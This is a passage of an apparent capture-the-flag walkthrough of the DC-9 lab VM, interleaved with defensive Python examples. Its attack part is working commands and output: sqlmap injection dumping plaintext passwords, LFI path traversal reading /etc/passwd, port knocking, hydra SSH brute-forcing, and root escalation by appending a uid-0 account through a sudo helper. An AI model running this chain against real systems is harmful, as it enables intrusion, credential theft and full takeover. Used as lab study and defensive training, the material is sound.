    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[08:00:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:00:18] [INFO] fetching columns for table 'UserDetails' in database 'users'
[08:00:18] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

[08:00:18] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/users/UserDetails.csv'
[08:00:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 08:00:18 /2024-06-01/

The dump gives every record of the UserDetails table in the users database, including each username and password; the passwords are stored in plaintext.

3.2 LFI (local file inclusion)

3.2.1 Login

Login page: http://192.168.6.145/manage.php
Username: admin
Password: transorbital1
(screenshot: login successful)

3.2.2 File inclusion vulnerability

Test URL: http://192.168.6.145/addrecord.php?file=../../../../etc/passwd
Response:

root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin 
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin 
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin 
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin 
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin 
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin 
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin 
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false 
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash 
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash 
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash 
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash 
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash 
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash 
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash 
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash 
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash 
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash 
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash 
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash 
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash 
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash 
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash 
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash 
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash

(screenshot: response)

The target's complete /etc/passwd comes back, so this page has a file inclusion vulnerability. Note the seventeen accounts from marym through janitor2 with /bin/bash shells; they match the usernames dumped from the UserDetails table.
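The root cause is that the file parameter is used as a path without any containment check, so ../ segments walk out of the include directory. Here is an added example (not code from the original post or from the DC-9 application) of the two checks a fixed addrecord.php would need, written in Python with pure path arithmetic so it runs anywhere: a containment check that resolves the value under an assumed include root, and the stronger allow-list approach in which the user supplies a page name rather than a path. The include root and page names are assumptions for the example.

```python
import posixpath

# Assumed include root for the example; the target's real web root is not shown.
INCLUDE_ROOT = "/var/www/html/includes"

# Allow-list: the pages the application is actually meant to include
# (hypothetical names, not the DC-9 application's own files).
ALLOWED_PAGES = {
    "header": "header.php",
    "footer": "footer.php",
    "addrecord": "addrecord.php",
}


def resolve_under_root(user_value, root=INCLUDE_ROOT):
    """Resolve a user-supplied 'file' value against root with pure path
    arithmetic (nothing is opened) and return the absolute path only if it
    stays inside root; otherwise return None.
    On a live server also pass the existing file through os.path.realpath,
    because symlinks are not resolved here."""
    if not user_value or "\x00" in user_value:   # empty value or NUL-byte truncation
        return None
    relative = user_value.lstrip("/")            # never honour an absolute path
    candidate = posixpath.normpath(posixpath.join(root, relative))
    # normpath folds every '../' in; if root is no longer the common prefix
    # of the result, the input escaped the directory.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def resolve_by_name(page_name):
    """Stronger alternative: look the name up in an allow-list so the user
    never supplies a path at all. Unknown names (and anything containing
    a slash or dots) simply do not match a key."""
    filename = ALLOWED_PAGES.get(page_name)
    return None if filename is None else posixpath.join(INCLUDE_ROOT, filename)


if __name__ == "__main__":
    for probe in ("header.php", "../../../../etc/passwd", "sub/../footer.php", ".."):
        print(f"{probe!r:32} -> {resolve_under_root(probe)}")
    print("by name:", resolve_by_name("footer"), resolve_by_name("../etc/passwd"))
```

The containment check rejects both probes used in this walkthrough (/etc/passwd and /etc/knockd.conf) while still allowing legitimate relative names; the allow-list version removes the path from user control entirely and is the form to prefer when the set of includable pages is fixed.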

3.2.3 Port knocking service

Use the file inclusion vulnerability found in the previous step to read the configuration file of the port-knocking daemon.
URL: http://192.168.6.145/addrecord.php?file=../../../../etc/knockd.conf
Response:

[options]
	UseSyslog

[openSSH]
	sequence    = 7469,8475,9842
	seq_timeout = 25
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn

[closeSSH]
	sequence    = 9842,8475,7469
	seq_timeout = 25
	command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn

(screenshot: knockd configuration)

[openSSH] sequence = 7469,8475,9842
This line says that, to open SSH, a TCP SYN must be sent to ports 7469, 8475 and 9842 in that order within seq_timeout = 25 seconds; knockd then inserts an iptables rule that accepts traffic from the knocking IP on port 22. To close it again, the ports are knocked in reverse order, 9842, 8475, 7469, and the rule is deleted.
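To make the semantics of that file explicit, here is an added example (not from the original post, and not knockd's own code) that parses the knockd.conf recovered above, extracts each sequence, and models knockd's matching rule on a list of observed SYNs from one source: the ports must arrive in order, every knock within seq_timeout of the first, and a packet to any other port resets progress. The matching model is a simplification written for this example.

```python
# knockd.conf as read from the target through the LFI (copied from the walkthrough)
KNOCKD_CONF = """\
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd(text):
    """Minimal reader for knockd's INI-like format: [section] headers,
    key = value lines and bare flags such as UseSyslog. Written for this
    example; it is not knockd's own parser."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif current is None:
            raise ValueError("directive outside any section: " + line)
        elif "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
        else:
            sections[current][line.lower()] = True   # bare flag
    return sections


def knock_sequences(sections):
    """Map every knock section to its port list, e.g. {'openSSH': [7469, 8475, 9842]}."""
    return {
        name: [int(p) for p in opts["sequence"].split(",")]
        for name, opts in sections.items()
        if name != "options" and "sequence" in opts
    }


def sequence_completed(knocks, sequence, timeout):
    """Simplified model of knockd's matching: `knocks` is a list of
    (seconds, port) SYNs seen from one source IP. The sequence completes
    when its ports arrive in order with every knock within `timeout`
    seconds of the first; a SYN to any other port resets progress."""
    stage, started = 0, None
    for ts, port in sorted(knocks):
        if stage and ts - started > timeout:
            stage, started = 0, None          # took too long: start over
        if port == sequence[stage]:
            if stage == 0:
                started = ts
            stage += 1
            if stage == len(sequence):
                return True
        else:
            stage, started = 0, None          # wrong port: start over
    return False


if __name__ == "__main__":
    seqs = knock_sequences(parse_knockd(KNOCKD_CONF))
    print(seqs)
    nc_loop = [(0, 7469), (1, 8475), (2, 9842), (3, 22)]  # the nc loop of section 3.3.1
    print("openSSH completed:", sequence_completed(nc_loop, seqs["openSSH"], 25))
```

Because the config sets tcpflags = syn, a refused connection is enough to count as a knock; the model therefore only looks at port numbers and timing, which is also why the nc loop in the next section works even though every connection is refused.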

3.3 SSH

3.3.1 Opening SSH with nc

┌──(root㉿kali)-[/home/kali]
└─#  for i in 7469 8475 9842 22 ;do nc 192.168.6.145 $i;done
(UNKNOWN) [192.168.6.145] 7469 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 8475 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 9842 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 22 (ssh) : Connection refused

As the output shows, every connection is refused. For the three knock ports that is expected: nothing listens on them, so the kernel answers with RST, but knockd still sees the SYN packets (tcpflags = syn) and counts them as the sequence. The rescan in the next step confirms that the sequence took effect.

3.3.2 Port scanning

Run the port scan again.

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 10:28 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:C1:5E:37 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds

Port 22 is now open; it is no longer "22/tcp filtered ssh". O(∩_∩)O haha~

3.3.3 hydra

3.3.3.1 Generating wordlists

Use the user information obtained via SQL injection (3.1.3.1) to build the wordlists
users.txt and passwd.txt.

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat users.txt 
marym     
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt 
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

3.3.3.2 Running hydra against SSH

Brute-force SSH with the generated wordlists.

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 10:50:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.6.145   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 10:51:39

Usernames and passwords obtained:

Username    Password
chandlerb   UrAG0D!
joeyt       Passw0rd
janitor     Ilovepeepee
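Seen from the target, the hydra run above is a dense burst of "Failed password" lines in auth.log, followed by an "Accepted password" for the guessed accounts. The following Python is an added detection example, not part of the original article: it parses OpenSSH log lines, looks for a burst of failures from one source within a short window, and reports any login that source was granted after the burst began. The log lines are constructed for this example (192.0.2.0/24 is a documentation range, not the lab network), and the threshold and window are assumed values.

```python
"""Detect SSH password-guessing bursts in OpenSSH auth.log lines."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in OpenSSH's syslog format (not a capture from DC-9).
SAMPLE_AUTH_LOG = """\
Jun  1 10:50:43 dc-9 sshd[1201]: Failed password for marym from 192.0.2.10 port 40112 ssh2
Jun  1 10:50:43 dc-9 sshd[1202]: Failed password for julied from 192.0.2.10 port 40113 ssh2
Jun  1 10:50:44 dc-9 sshd[1203]: Failed password for fredf from 192.0.2.10 port 40114 ssh2
Jun  1 10:50:44 dc-9 sshd[1204]: Failed password for invalid user admin from 192.0.2.10 port 40115 ssh2
Jun  1 10:50:45 dc-9 sshd[1205]: Failed password for chandlerb from 192.0.2.10 port 40116 ssh2
Jun  1 10:50:46 dc-9 sshd[1206]: Failed password for joeyt from 192.0.2.10 port 40117 ssh2
Jun  1 10:50:47 dc-9 sshd[1207]: Accepted password for chandlerb from 192.0.2.10 port 40118 ssh2
Jun  1 10:50:48 dc-9 sshd[1208]: Failed password for janitor from 192.0.2.10 port 40119 ssh2
Jun  1 10:52:30 dc-9 sshd[1300]: Failed password for fredf from 192.0.2.77 port 51000 ssh2
Jun  1 10:52:40 dc-9 sshd[1301]: Accepted password for fredf from 192.0.2.77 port 51001 ssh2
"""

_PREFIX = r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
FAILED_RE = re.compile(_PREFIX + r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPT_RE = re.compile(_PREFIX + r"Accepted password for (?P<user>\S+) from (?P<ip>\S+) port \d+")


def _parse_ts(text: str) -> datetime:
    # syslog timestamps carry no year; relative ordering is all we need here
    return datetime.strptime(text, "%b %d %H:%M:%S")


def analyze(log_text: str, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Return {source_ip: report} for every source that produced at least
    `threshold` failed logins inside `window_seconds`. The report lists the
    usernames tried and any account that source logged into after the burst
    started (a successful guess, the case to act on first)."""
    failures = defaultdict(list)   # ip -> [(time, user)]
    accepts = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            failures[m["ip"]].append((_parse_ts(m["ts"]), m["user"]))
            continue
        m = ACCEPT_RE.match(line)
        if m:
            accepts[m["ip"]].append((_parse_ts(m["ts"]), m["user"]))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        # sliding window: any `threshold` consecutive failures inside the window
        for i in range(len(events) - threshold + 1):
            start, end = events[i][0], events[i + threshold - 1][0]
            if (end - start).total_seconds() <= window_seconds:
                alerts[ip] = {
                    "failures": len(events),
                    "users_tried": sorted({u for _, u in events}),
                    "accepted_after_burst": sorted({u for t, u in accepts[ip] if t >= start}),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, report in analyze(SAMPLE_AUTH_LOG).items():
        print(ip, report)
```

On the sample, 192.0.2.10 is flagged (seven failures in a few seconds, and chandlerb accepted mid-burst) while the single mistyped password from 192.0.2.77 is not. The same burst is what makes fail2ban-style rate limiting and the hydra warning about "-t 4" matter: a slow spray keeps each source under the threshold, so the window and threshold should be tuned against the real login rate, not the defaults used here.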

3.4 SSH login

3.4.1 chandlerb

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh chandlerb@192.168.6.145                                                     
chandlerb@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ whoami
chandlerb
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ cd /home
chandlerb@dc-9:/home$ ls
barneyr  chandlerb  janitor   jerrym  julied  monicag  rachelg	scoots	wilmaf
bettyr	 fredf	    janitor2  joeyt   marym   phoebeb  rossg	tomc
chandlerb@dc-9:/home$ cd chandlerb/
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ 

Nothing useful found in the chandlerb account.

3.4.2 joeyt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh joeyt@192.168.6.145    
joeyt@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
joeyt@dc-9:~$ ls
joeyt@dc-9:~$ cd /home
joeyt@dc-9:/home$ ls
barneyr  bettyr  chandlerb  fredf  janitor  janitor2  jerrym  joeyt  julied  marym  monicag  phoebeb  rachelg  rossg  scoots  tomc  wilmaf
joeyt@dc-9:/home$ 

Nothing more of use found in the joeyt account.

3.4.3 janitor

┌──(root㉿kali)-[/home/kali]
└─# ssh janitor@192.168.6.145  
janitor@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls
janitor@dc-9:~$ ls -al
total 16
drwx------  4 janitor janitor 4096 Jun  2 00:51 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Jun  2 00:51 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$ 
janitor@dc-9:~/.secrets-for-putin$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for janitor: 
Sorry, user janitor may not run sudo on dc-9.

As shown above, some passwords were found; add the newly found passwords to the password wordlist. This user also has no sudo rights.

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# vim passwd.txt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt            
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Run hydra again.

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 11:48:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.6.145   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[STATUS] 329.00 tries/min, 329 tries in 00:01h, 63 to do in 00:01h, 15 active
[22][ssh] host: 192.168.6.145   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 5 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 11:49:34

New username and password obtained:

Username    Password
fredf       B4-Tru3-001

3.4.4 fredf

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh fredf@192.168.6.145    
fredf@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ ls
fredf@dc-9:~$ ls -al
total 12
drwx------  3 fredf fredf 4096 Jun  2 01:48 .
drwxr-xr-x 19 root  root  4096 Dec 29  2019 ..
lrwxrwxrwx  1 fredf fredf    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 fredf fredf 4096 Jun  2 01:48 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$

In the fredf account we find a program that may be run through sudo:
Key line: (root) NOPASSWD: /opt/devstuff/dist/test/test
It can be executed as root without a password.

Look at test.py:

fredf@dc-9:~$ cd /opt/devstuff
fredf@dc-9:/opt/devstuff$ ls -al
total 28
drwxr-xr-x 5 root root 4096 Dec 29  2019 .
drwxr-xr-x 4 root root 4096 Dec 29  2019 ..
drwxr-xr-x 3 root root 4096 Dec 29  2019 build
drwxr-xr-x 3 root root 4096 Dec 29  2019 dist
drwxr-xr-x 2 root root 4096 Dec 29  2019 __pycache__
-rw-r--r-- 1 root root  250 Dec 29  2019 test.py
-rw-r--r-- 1 root root  959 Dec 29  2019 test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$ 

This script appends the contents of one file to another. Because it runs as root through sudo, it can append a line to /etc/passwd. So we generate a password hash, build a user entry with root privileges, and have the script append it to /etc/passwd; logging in as that user then gives a root shell, completing the privilege escalation.
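The root cause is a sudo rule that grants NOPASSWD on a tool whose two arguments are arbitrary paths: whoever can run it can read and append to any file as root. As an added example (not the DC-9 author's code and not a fix shipped with the lab), here is the same read-and-append tool written to confine both paths to a single directory, resolving symlinks before the check so a link planted inside the directory cannot point back out. ALLOWED_DIR is an assumed location; the demo function exercises the check in a scratch directory.

```python
"""Hardened variant of the read-and-append tool: both paths must stay inside one directory."""
import os
import sys
import tempfile

# Assumed allow-list (not from the page): the only directory the tool may touch.
ALLOWED_DIR = "/opt/devstuff/data"


def is_within(path: str, base: str) -> bool:
    """True if `path`, with every symlink resolved, lies inside `base`."""
    real = os.path.realpath(path)
    base = os.path.realpath(base)
    return os.path.commonpath([real, base]) == base


def append_file(src: str, dst: str, allowed_dir: str = ALLOWED_DIR) -> int:
    """Append the contents of src to dst; refuse either path outside allowed_dir.
    Returns the number of bytes appended, raises PermissionError when refused."""
    for path in (src, dst):
        if not is_within(path, allowed_dir):
            raise PermissionError(f"{path} is outside {allowed_dir}")
    with open(src, "rb") as f:
        data = f.read()
    with open(dst, "ab") as f:
        f.write(data)
    return len(data)


def main(argv) -> int:
    if len(argv) != 3:
        print("Usage: test.py read append", file=sys.stderr)
        return 1
    try:
        append_file(argv[1], argv[2])
    except (PermissionError, OSError) as exc:
        print(f"refused: {exc}", file=sys.stderr)
        return 1
    return 0


def demo() -> dict:
    """Run the check in a throwaway directory and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        data_dir = os.path.join(tmp, "data")
        os.mkdir(data_dir)
        src = os.path.join(data_dir, "note.txt")
        dst = os.path.join(data_dir, "log.txt")
        with open(src, "w") as f:
            f.write("hello\n")
        appended = append_file(src, dst, allowed_dir=data_dir)

        outside = os.path.join(tmp, "passwd")          # stands in for /etc/passwd
        try:
            append_file(src, outside, allowed_dir=data_dir)
            refused = False
        except PermissionError:
            refused = True

        link = os.path.join(data_dir, "escape")        # symlink inside pointing outside
        os.symlink(outside, link)
        try:
            append_file(src, link, allowed_dir=data_dir)
            symlink_refused = False
        except PermissionError:
            symlink_refused = True

        with open(dst) as f:
            content = f.read()
    return {"appended": appended, "content": content,
            "refused": refused, "symlink_refused": symlink_refused}


if __name__ == "__main__":
    if len(sys.argv) == 1:
        print(demo())
    else:
        sys.exit(main(sys.argv))
```

The path check is the minimum; the better fix is not to grant NOPASSWD root to a file-copying helper at all, or to give the sudo rule fixed arguments so the user cannot choose the paths. Note also that the original tool opens the destination in append mode without any ownership check, which is exactly what lets it reach /etc/passwd.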

3.5 Linux privilege escalation

3.5.1 Generating a password hash on Kali

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# openssl passwd -1 -salt admin 123456
$1$admin$LClYcRe.ee8dQwgrFc5nz.

The generated password hash:

$1$admin$LClYcRe.ee8dQwgrFc5nz.

3.5.2 Writing the entry into /etc/passwd

Run the following commands in order:

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
cd /opt/devstuff/dist/test/
ls -al
sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff$ echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff$ cd /opt/devstuff/dist/test/
fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root    4096 Dec 29  2019 .
drwxr-xr-x 3 root root    4096 Dec 29  2019 ..
